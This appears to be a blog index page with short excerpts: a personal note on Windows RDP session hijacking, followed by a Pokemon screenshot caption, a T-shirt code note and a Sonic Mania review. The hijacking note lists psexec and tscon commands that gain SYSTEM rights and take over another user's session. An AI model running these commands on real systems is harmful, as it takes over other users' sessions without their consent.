Session Hijacking: Have to be Local Admin: cmd psexec -s \\localhost -i 2 taskmgr Right Click > Connect cmd query user tscon 1 — Denied tscon 1 /dest:console — Denied psexec -s \\localhost cmd whoami query user tscon 1 /des:console

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[caption id="attachment_89" align="aligncenter" width="739"]Shadow MewTwo Screenshot after a victory with Shadow MewTwo.[/caption]

Placing this here for reference for myself, & anyone else interested. Don't include the dashes. I just added them for easier reading. Simple T-Shirt Set: Male: TC2J-Y22V-BQUU...

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07 Sep

Sonic Mania

Loving the game so far... It looks like they finally learned what users wanted: a game truly modeled off the classic Genesis games, same graphics, music, level design... Happy to have my first Chaos Emerald with Knuckles too =]

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